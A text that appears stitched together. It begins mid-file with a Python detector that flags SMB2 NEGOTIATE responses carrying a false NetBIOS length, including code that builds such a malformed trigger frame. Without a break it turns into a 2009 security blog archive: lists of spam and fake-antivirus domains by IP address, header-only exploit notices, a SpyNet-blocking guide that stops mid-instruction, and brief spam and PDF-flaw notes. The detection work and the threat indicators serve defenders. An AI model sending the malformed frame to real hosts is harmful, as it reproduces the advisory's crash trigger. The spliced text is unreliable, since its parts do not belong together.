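        structure_size, = struct.unpack_from('<H', payload, 4)   # must be 64
        command, = struct.unpack_from('<H', payload, 12)
        flags, = struct.unpack_from('<I', payload, 16)
        info.update(
            smb2=True,
            command=command,
            is_response=bool(flags & SMB2_FLAGS_SERVER_TO_REDIR),
            header_ok=(structure_size == SMB2_HEADER_SIZE),
        )
    return info


def should_alert(frame):
    """Return an alert reason, or None. Any NetBIOS length that disagrees with
    the bytes on the wire is malformed; an SMB2 NEGOTIATE response carrying
    such a header is the shape of the trigger in the advisory above."""
    info = inspect_netbios_frame(frame)
    if info['length_ok']:
        return None
    if info['smb2'] and info['command'] == SMB2_NEGOTIATE and info['is_response']:
        return ('SMB2 NEGOTIATE response with NetBIOS length %d but %d payload bytes'
                % (info['declared_len'], info['actual_len']))
    return ('NetBIOS length %d disagrees with %d payload bytes'
            % (info['declared_len'], info['actual_len']))


def build_negotiate_response(declared_len=None):
    """Constructed sample: a minimal SMB2 NEGOTIATE response (64-byte header,
    then a 94-byte body that is zero after its StructureSize field; 158 = 0x9e
    bytes in total) wrapped in a NetBIOS session header. declared_len lets the
    header lie about the size, as the PoC packet does."""
    header = (SMB2_MAGIC
              + struct.pack('<HHIHHI', SMB2_HEADER_SIZE, 0, 0, SMB2_NEGOTIATE, 1,
                            SMB2_FLAGS_SERVER_TO_REDIR)
              + b'\x00' * 44)
    body = struct.pack('<H', 65) + b'\x00' * 92
    payload = header + body
    if declared_len is None:
        declared_len = len(payload)
    return b'\x00' + declared_len.to_bytes(3, 'big') + payload


WELL_FORMED_FRAME = build_negotiate_response()
MALFORMED_FRAME = build_negotiate_response(0x9a)  # declares 0x9a, carries 0x9e


if __name__ == '__main__':
    for label, frame in (('well-formed', WELL_FORMED_FRAME), ('malformed', MALFORMED_FRAME)):
        print(label, '->', should_alert(frame))
```

The advisory's own mitigation (blocking SMB at the perimeter until a fix ships) is the control; this check is for telling, from a capture, whether such a frame has been seen by a host on the LAN.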

Thursday, November 12, 2009

Spam ** 12-Nov-09

IP Address: 213.155.22.193

Domains sharing same IP address:

*.bnewage.com
*.fasynet.com
*.jainpage.com
*.lewstime.com
*.mainlage.com
*.nedwage.com
*.omeair.com
*.onlinefree-scan.com
*.pcalertsite.com
*.pcnoticesecurity.com
*.quicklini.com
*.roublenuk.com
*.somecelan.com
*.tivelife.com
*.vcashpay.com
*.xoublenuk.com
casnpay.com
checkerforfree.com
datatrustprotect.com
fastnety.com
fastrnet.com
faxtnet.com
fdoublenuk.com
firstyplace.com
hlmv.com
jainpage.com
litnmail.com
mail.checkerforfree.com
mail.checkmy-pcnow.com
mail.malware-reaper.com
mail.pcthreatremover.com
mail.pctrouble-remover.com
mail.scan-4-clean.com
mail.scareware-killer.com
nnewage.com
ns1.aelrtcenter.com
ns1.bnewage.com
ns1.casnpay.com
ns1.checkerforfree.com
ns1.checkmy-pcnow.com
ns1.datatrustprotect.com
ns1.doublenuks.com
ns1.fastnety.com
ns1.fastrnet.com
ns1.fasynet.com
ns1.faxtnet.com
ns1.fdoublenuk.com
ns1.firstyplace.com
ns1.freatdinner.com
ns1.ispyremover.com
ns1.jainpage.com
ns1.lewstime.com
ns1.liftven.com
ns1.litmai.com
ns1.litnmail.com
ns1.main-age.com
ns1.mainlage.com
ns1.malware-reaper.com
ns1.nedwage.com
ns1.nnewage.com
ns1.omeair.com
ns1.onlinefree-scan.com
ns1.onlinelivescanner.com
ns1.pcalertsite.com
ns1.pcnoticesecurity.com
ns1.pcthreatremover.com
ns1.pctrouble-remover.com
ns1.plitmail.com
ns1.quicklini.com
ns1.roublenuk.com
ns1.scan-4-clean.com
ns1.scareware-killer.com
ns1.secmodify.com
ns1.secupgrade.com
ns1.sokeair.com
ns1.some-air.com
ns1.somecelan.com
ns1.someclen.com
ns1.somewair.com
ns1.somewir.com
ns1.somsclean.com
ns1.somweclean.com
ns1.thealertsecurity.com
ns1.tivelife.com
ns1.topspyfreecheck.com
ns1.vcashpay.com
ns1.xoublenuk.com
ns1.yourguardpc.com
ns1.zeropspy.com
ns1.zonewecurity.com
omeair.com
onlinefree-scan.com
onlinelivescanner.com
pcalertsite.com
plitmail.com
secmodify.com
secupgrade.com
some-air.com
somecelan.com
somewir.com
somsclean.com
tivelife.com
vcashpay.com
www.malware-reaper.com
www.topspyfreecheck.com
www.vcashpay.com
www.yourguardpc.com
yourguardpc.com
zonewecurity.com
faxtnet.com
firstyplace.com
freatdinner.com
litmai.com
onlinelivescanner.com
quicklini.com
somecelan.com


IP Address: 213.155.22.194

Domains sharing same IP address:

*.casnpay.com
*.datatrustprotect.com
*.doublenuks.com
*.fastnety.com
*.fastrnet.com
*.faxtnet.com
*.fdoublenuk.com
*.gvirusprotect.com
*.liftven.com
*.litnmail.com
*.malwardetect.com
*.nnewage.com
*.secmodify.com
*.secupgrade.com
*.someclen.com
*.somsclean.com
*.somweclean.com
*.yourguardpc.com
*.zonewecurity.com
bnewage.com
doublenuks.com
fasynet.com
gvirusprotect.com
ispyremover.com
lewstime.com
liftven.com
nedwage.com
ns2.aelrtcenter.com
ns2.bnewage.com
ns2.casnpay.com
ns2.checkmy-pcnow.com
ns2.datatrustprotect.com
ns2.doublenuks.com
ns2.fastnety.com
ns2.fastrnet.com
ns2.fasynet.com
ns2.faxtnet.com
ns2.fdoublenuk.com
ns2.gvirusprotect.com
ns2.ispyremover.com
ns2.lewstime.com
ns2.liftven.com
ns2.litnmail.com
ns2.malwardetect.com
ns2.malware-reaper.com
ns2.nedwage.com
ns2.nnewage.com
ns2.onlinefree-scan.com
ns2.onlinelivescanner.com
ns2.pcalertsite.com
ns2.pcnoticesecurity.com
ns2.pcthreatremover.com
ns2.pctrouble-remover.com
ns2.quicklini.com
ns2.roublenuk.com
ns2.scan-4-clean.com
ns2.scareware-killer.com
ns2.secmodify.com
ns2.secupgrade.com
ns2.somecelan.com
ns2.someclen.com
ns2.somsclean.com
ns2.somweclean.com
ns2.thealertsecurity.com
ns2.tivelife.com
ns2.topspyfreecheck.com
ns2.vcashpay.com
ns2.xoublenuk.com
ns2.yourguardpc.com
ns2.zonewecurity.com
ocscanner.com
quicklini.com
roublenuk.com
someclen.com
somweclean.com
thealertsecurity.com
www.nnewage.com
www.onlinefree-scan.com
www.pcnoticesecurity.com
www.thealertsecurity.com
xoublenuk.com
zeropspy.com
faxtnet.com
lewstime.com
onlinefree-scan.com
quicklini.com
roublenuk.com
xoublenuk.com
yourguardpc.com

IP Address: 85.12.25.110

Domains sharing same IP address:

*.bigsald.com
*.finedcar.com
*.firstyplace.com
*.freatdinner.com
*.jucefresh.com
*.juicefresn.com
*.juixefresh.com
*.litmai.com
*.main-age.com
*.plitmail.com
*.sokeair.com
*.some-air.com
*.somewair.com
*.somewir.com
*.uxflat.com
bigsald.com
birspel.com
finedcar.com
freatdinner.com
igfight.com
juicefresn.com
juixefresh.com
litmai.com
main-age.com
mainlage.com
ns1.bigsald.com
ns1.bigssle.com
ns1.bigvight.com
ns1.elltime.com
ns1.finedcar.com
ns1.ibrdspel.com
ns1.igfight.com
ns1.jucefresh.com
ns1.juicefresn.com
ns1.juixefresh.com
ns1.uxflat.com
ns1.vindcar.com
ns1.welltome.com
ns2.firstyplace.com
ns2.freatdinner.com
ns2.jainpage.com
ns2.litmai.com
ns2.main-age.com
ns2.mainlage.com
ns2.omeair.com
ns2.plitmail.com
ns2.sokeair.com
ns2.some-air.com
ns2.somewair.com
ns2.somewir.com
sokeair.com
uxflat.com
welltome.com
www.tindcar.com
bigsae.com
bigvight.com
nigsale.com
plitmail.com
poresskey.com
welltome.com

IP Address: 69.4.230.140

Domains sharing same IP address:

multidl.com
www.multidl.com

AntiAID Fake Antivirus

AntiAID fake antivirus


antiaid.com - 85.12.25.111

*.blockkeeper.com
*.systemveteran.com
antiaid.com
blockkeeper.com
blockprotector.com
ns1.blockkeeper.com
ns1.blockprotector.com
ns1.systemfighter.com
ns1.systemveteran.com
ns1.systemwarrior.com
systemveteran.com
www.blockkeeper.com
blockkeeper.com
blockprotector.com
systemfighter.com
systemveteran.com
systemwarrior.com

Tuesday, November 10, 2009

Spam ** 10-Nov-09

IP Address:
121.11.85.32
218.75.149.156

www.iptobmue.cn
admin.blushcold.com
admin.iqbgwrue.cn
admin.sunwrong.com
bell.roundflow.com
bendbrand.com
bgu735.ocsmncea.cn
blahbeauty.com
blushcold.com
blushwire.com
catlike.cruisesound.com
code59884.rolexoffertoday.com
cruisesound.com
flushstick.com
iawhosue.cn
iqbgwrue.cn
lgt674.iawhosue.cn
marlinautumn.com
marlinsign.com
nrnpf343.aijnaido.cn
ns1.getsomedns.com
ns1.marlinsign.com
ns1.onlinetagdns.com
ns1.serverraw.com
ns1.sunwrong.com
ns2.dnslackingtemp.com
ns2.iqmeiuea.cn
ns2.marlinsign.com
nucleic.marlinautumn.com
ocsmncea.cn
osjjjzea.cn
seamarlin.com
siberia.marlinautumn.com
since.brownsunny.com
smart.marlinsign.com
smart.seamarlin.com
stipple.brownsunny.com
sunwrong.com
www.blahbeauty.com
www.flushstick.com
www.sunwrong.com

IP Address:
218.93.202.120
60.172.210.4

6678net.com
chinacarveout.com
chinadigger.com
chinajiaoao.com
cmccblog.com
cuninfo.com
cuniv.com
jinjk.com
jiwudu.com
mail.cmccblog.com
maogai.com
oumel.com
yiyixue.com
yybest.com
0cb26.jduridew.cn
178.zsezukes.cn
2002.vkalufor.cn
230951.gcuzipoj.cn
2edb5.jogawaw.cn
303190.jyasuhev.cn
3293ae.bjexipat.cn
38b680.xreyupuc.cn
402.zulapep.cn
428c.ntademef.cn
4ea6.pzuqeleh.cn
51cf.xpasetad.cn
523.fmacinuy.cn
532b.jjobijen.cn
5965a.sxuzejaf.cn
5c563.cquconej.cn
66d2f3.gzuvafuz.cn
66ead0.qnabefuc.cn
68e4a.gxohudet.cn
6bf8.nxugiral.cn
702.rwihopot.cn
8a4695.txusinuf.cn
8acc.zsumuhey.cn
90c06.dkaxirey.cn
9340e.zcuxedoc.cn
9d8d1.bjidasut.cn
b1ec.hlapowoc.cn
b26.nwifiwed.cn
b555.gnaburen.cn
ba94.rwukison.cn
benefit.gyefocev.cn
bj9.ru
borngentle.com
c852.cvupuqal.cn
d11.hfizipan.cn
d57e8.klosoqiw.cn
dc7f.qgapefey.cn
e75.jagegop.cn
eb0.pxefidag.cn
eef56.lyalojuf.cn
everest.qdegivah.cn
f984.jnomariq.cn
gguwelag.cn
gxohudet.cn
hlapowoc.cn
jagegop.cn
jyasuhev.cn
klosoqiw.cn
kmakafum.cn
lqafokuw.cn
lxucubaf.cn
mhuhafuy.cn
movement.qlonipaf.cn
nevutud.cn
ntademef.cn
overal.wsemuhin.cn
pxefidag.cn
pyonelul.cn
qcesipof.cn
qforuhum.cn
rikanoj.cn
rkujalal.cn
rwihopot.cn
sxopiken.cn
sxuzejaf.cn
vkalufor.cn
www.ddekowim.cn
www.lxucubaf.cn
www.slujarug.cn
www.zziduxux.cn
xcopidox.cn
xehicaw.cn
xlejuwof.cn
xreyupuc.cn
xzewutos.cn
ysuyonoh.cn
yveqekov.cn
zicorem.cn
zsezukes.cn
zulapep.cn
zziduxux.cn
www.fosigwc.cn
www.zocatwl.cn
www.mifezxd.cn

IP Address: 193.227.114.2

yupnyojrufl.com
admin.kynugtab.com
cefjedhoha.com
homru.com
icpigyfzin.com
joellinoa.com
kynugtab.com
mail.cefjedhoha.com
mail.kynugtab.com
ns1.homru.com
ns2.homru.com

IP Address: 111.67.200.246

157c2.leyoksh.cn
f8b52.leyoksh.cn
38004a1.himoxbb.cn
www.zehuqlq.cn
ffb4973.xogurwy.cn
www.tuyezxx.cn
www.yexawls.cn
www.pijimjb.cn

IP Address: 124.217.210.223

brighthub.mindbigger.cn
diqorad.cn
discover.mindbigger.cn
enginering.mindbigger.cn
jujezuj.cn
mindbigger.cn
mindshops.cn
ns1.diqorad.cn
ns1.jujezuj.cn
ns1.mindbigger.cn
ns1.mindshops.cn
ns1.rvoxbdci.cn
ns1.rxcounterattack.cn
ns1.rxerudition.cn
ns1.rxexacerbate.cn
ns1.rxlitters.cn
ns1.rxpaternoster.cn
ns1.rxpuddle.cn
ns1.rxreemployment.cn
ns1.rxsectors.cn
ns1.rxslobbered.cn
ns1.rxtweak.cn
ns1.rxyoghurt.cn
ns1.wilfre.cn
ns1.zapoqiw.cn
ns2.brightpalilaliaazuz.cn
ns2.diqorad.cn
ns2.mindbigger.cn
ns2.rvoxbdci.cn
ns2.rxcounterattack.cn
ns2.rxerudition.cn
ns2.rxexacerbate.cn
ns2.rxlitters.cn
ns2.rxpaternoster.cn
ns2.rxreemployment.cn
ns2.rxsectors.cn
ns2.rxslobbered.cn
ns2.rxtweak.cn
ns2.rxyoghurt.cn
ns2.zapoqiw.cn
ns3.diqorad.cn
ns3.jujezuj.cn
ns3.mindbigger.cn
ns3.rvoxbdci.cn
ns3.rxcounterattack.cn
ns3.rxerudition.cn
ns3.rxexacerbate.cn
ns3.rxlitters.cn
ns3.rxpaternoster.cn
ns3.rxpuddle.cn
ns3.rxreemployment.cn
ns3.rxslobbered.cn
ns3.rxtweak.cn
ns3.wilfre.cn
ns3.zapoqiw.cn
ns4.diqorad.cn
ns4.mindbigger.cn
ns4.rvoxbdci.cn
ns4.rxerudition.cn
ns4.rxexacerbate.cn
ns4.rxlitters.cn
ns4.rxpaternoster.cn
ns4.rxpuddle.cn
ns4.rxreemployment.cn
ns4.rxsectors.cn
ns4.rxslobbered.cn
ns4.rxtweak.cn
ns4.rxyoghurt.cn
ns4.zapoqiw.cn
peril.mindbigger.cn
rxchoice.cn
rxcounterattack.cn
rxerudition.cn
rxexacerbate.cn
rxhugs.cn
rxlitters.cn
rxoccupier.cn
rxpaternoster.cn
rxpuddle.cn
rxreemployment.cn
rxsectors.cn
rxslobbered.cn
rxtonsillectomy.cn
rxtweak.cn
rxyoghurt.cn
scotish.fodmantel.cn
www.diqorad.cn
www.jujezuj.cn
www.rvoxbdci.cn
www.rxcounterattack.cn
www.rxerudition.cn
www.rxexacerbate.cn
www.rxlitters.cn
www.rxoccupier.cn
www.rxpaternoster.cn
www.rxpuddle.cn
www.rxreemployment.cn
www.rxsectors.cn
www.rxslobbered.cn
www.rxtweak.cn
www.rxyoghurt.cn
www.zapoqiw.cn
zapoqiw.cn
finding.bulliedwatches.cn
facing.minddeal.cn

IP Address: 221.203.168.175

05e.keiscpom.cn
09cfn.ptijsbat.cn
0bv.adadjvcbje.cn
4bf.tkmqtnek.cn
4nwnzdw.yxukawlv.cn
5wh.uoosfkvfbt.cn
6fuwf.listweek.cn
7p5t.bcozanow.cn
880y6.xrcatvgs.cn
9tqtg7.srwuiuyc.cn
aanfsgnuje.cn
adadjvcbje.cn
admin.aanfsgnuje.cn
admin.cnsffmvssw.cn
admin.flushstreet.com
admin.flushwrong.com
admin.flushyear.com
admin.fvqdalrfuj.cn
admin.groundlong.cn
admin.hxukawyv.cn
admin.iaxacrug.cn
admin.iqbgwrue.cn
admin.ittjdfhh.cn
admin.listweek.cn
admin.padfgrvbit.cn
admin.ptijsbat.cn
admin.roundlong.cn
admin.srwuiuyc.cn
admin.tkmqtnek.cn
admin.ultimate-replicas.com
admin.uoosfkvfbt.cn
admin.wordlong.cn
admin.yxukawlv.cn
b9or.veiqscia.cn
cnsffmvssw.cn
crjd90.wordlong.cn
drcfnwl.icesfjsfsb.cn
ea759.diffsivioe.cn
eo0.groundlong.cn
f3vxcw6.fvqdalrfuj.cn
f5ow3fr.aanfsgnuje.cn
fbevgi.cnsffmvssw.cn
flushstreet.com
flushwrong.com
flushyear.com
fvqdalrfuj.cn
groundlong.cn
ht92tu.padfgrvbit.cn
hxukawyv.cn
iaxacrug.cn
iqbgwrue.cn
ittjdfhh.cn
ivu.seiapsny.cn
jei70p.icesfjsfsb.cn
listweek.cn
ns1.aanfsgnuje.cn
ns1.cnsffmvssw.cn
ns1.flushstreet.com
ns1.flushwrong.com
ns1.flushyear.com
ns1.fvqdalrfuj.cn
ns1.groundlong.cn
ns1.hxukawyv.cn
ns1.iqbgwrue.cn
ns1.ittjdfhh.cn
ns1.listweek.cn
ns1.padfgrvbit.cn
ns1.roundlong.cn
ns1.tkmqtnek.cn
ns1.ukmqtnsc.cn
ns1.ultimate-replicas.com
ns1.uoosfkvfbt.cn
ns1.wordlong.cn
ns1.yeiexixo.cn
ns2.aanfsgnuje.cn
ns2.cnsffmvssw.cn
ns2.fvqdalrfuj.cn
ns2.groundlong.cn
ns2.hxukawyv.cn
ns2.iqbgwrue.cn
ns2.ittjdfhh.cn
ns2.listweek.cn
ns2.padfgrvbit.cn
ns2.roundlong.cn
ns2.tkmqtnek.cn
ns2.uoosfkvfbt.cn
ns2.wordlong.cn
ns2.xeuiavwp.cn
omsw98.seiapsny.cn
padfgrvbit.cn
roundlong.cn
tkmqtnek.cn
ultimate-replicas.com
uoosfkvfbt.cn
walyjl4.hxukawyv.cn
wordlong.cn
wsess.deivgxri.cn
wyr.ittjdfhh.cn
xc12.roundlong.cn
xcwd.yxukawlv.cn
qirlr2.pinazxjud.cn
87ie3c.hxusksfffv.cn

IP Address: 58.22.138.39

rxdemographical.cn
ns3.rxyoghurt.cn
ns4.rxcounterattack.cn
rxforgery.cn
rxcounterattack.cn
rxyoghurt.cn


Thursday, November 5, 2009

Microsoft GDI+ TIFF Memory Corruption Vulnerability

Reference: http://www.shinnai.net

#-----------------------------------------------------------------------
# Microsoft GDI+ TIFF Memory Corruption Vulnerability
# url: http://www.microsoft.com/technet/security/Bulletin/ms09-062.mspx
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#-----------------------------------------------------------------------


Reference:

Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS


Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/

File: MSOWC.DLL
Ver.: 9.0.0.8966
ProgID: OWC.DataSourceControl.9
Descr.: Microsoft Office Data Source Control 9.0

Marked: RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety:True
IDisp Safe: Safe for untrusted: caller

Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)

Rogue AV Antivirus Reviews - Paretologic, Norton, Mcafee, PCtools


IP Address: 209.200.247.194

Domains sharing same IP address:


Wednesday, November 4, 2009

Spam ** 04-Nov-09

IP Address: 208.67.219.132

Domains sharing same IP Address:

IP Address: 59.53.88.133

Domains sharing same IP address:


IP Address: 60.172.210.4

Domains sharing same IP address:


IP Address: 60.172.210.3

Domains sharing same IP address:


IP Address: 60.172.210.5

Domains sharing same IP address:


IP Address: 218.75.149.156

Domains sharing same IP address:


IP Address: 221.203.168.175

Domains sharing same IP address:


Monday, November 2, 2009

How to block Microsoft SpyNet

This is not something new, but I would like to post it again here so that Windows 7 and Vista users are aware of it. Normally the intrusion prevention system on your machine will alert when SpyNet is pinging.


Microsoft Security Essentials

Microsoft Security Essentials is the latest avatar of Microsoft antispyware. It is a free, signature-based antimalware program that protects your system against potential threats such as viruses, spyware, and other potentially unwanted software.

Microsoft Spynet

When you first install Microsoft Security Essentials you agree to become a part of this unfortunately named community of Windows Defender and Microsoft Security Essentials users. Microsoft SpyNet helps Microsoft in differentiating a malware program from a legitimate program based on inputs automatically collected from the Microsoft SpyNet members.

There are two types of membership: basic and advanced. As a basic member (the default), your copy of Microsoft Security Essentials “sends basic information to Microsoft about software that Microsoft Security Essentials detects, including where the software came from, the actions that you apply or that Microsoft Security Essentials applies automatically, and whether the actions were successful. In some instances, personal information might unintentionally be sent to Microsoft. However, Microsoft will not use this information to identify you or to contact you.”

An advanced member sends more information in addition to what is stated above, and again “in some instances, personal information might unintentionally be sent to Microsoft.” Furthermore, “Microsoft Security Essentials also collects standard computer information, which includes information about your computer software and hardware, such as your IP address, operating system, Web browser software, and version.”

There is no option not to participate in the SpyNet community. Microsoft Security Essentials privacy policy confirms that “to continue using Microsoft Security Essentials, you will need to remain a member of this online community.”

Mandatory enrollment in the SpyNet community makes many people see red and seek ways to disable Microsoft SpyNet without losing the functionality of Microsoft Security Essentials.

Blocking Microsoft SpyNet without losing functionality

According to Microsoft documentation, “The online Microsoft SpyNet community helps you see how other people respond to software that has not yet been classified for risks. You can use this information to help you choose whether to allow this software on your computer. In turn, if you participate, your choices are added to the community ratings to help other people decide what to do.” The community also helps stop the spread of new infections.

This means that if you block Microsoft SpyNet, your choices in rating the programs you run are NOT added to the community, while you still use other people’s choices to respond to potential threats. If you really want to do this, proceed further.

There are two ways to go about this. One is by editing the registry; the other is by adding a couple of entries to your hosts file.

Block Microsoft SpyNet by editing the Registry

All the usual caveats about editing the Windows registry apply here. Before you edit the registry, export the keys you plan to edit, or back up the whole registry (see: How to back up and restore the registry in Windows).

Type regedit in the Run box and press Enter to open the Registry Editor. Navigate to and select the following key in the left pane:

The XML-Bombed PDF

Reference: blog.didierstevens.com

Didier Stevens disclosed a PDF exploit related to the Extensible Metadata Platform (XMP). Adobe is already aware of this vulnerability, and a patch was released to fix it.


simple-works.org spamming in Facebook

It is not surprising that Facebook has become part of the threat landscape over the last few months, and more and more threats will come from Facebook. A reader today sent me an email about a spam message spreading from hacked or compromised accounts. The message reads "Saturday News simple-works.org". It entices the friends of the account to view the URL posted in the message. From there, users can easily become victims of web attacks.


Other than Facebook, Twitter has also become another threat landscape for spreading suspicious links. According to trendistic.com, "simple-works.org" is one of the popular terms spreading through Twitter.


Reference: trendistic.com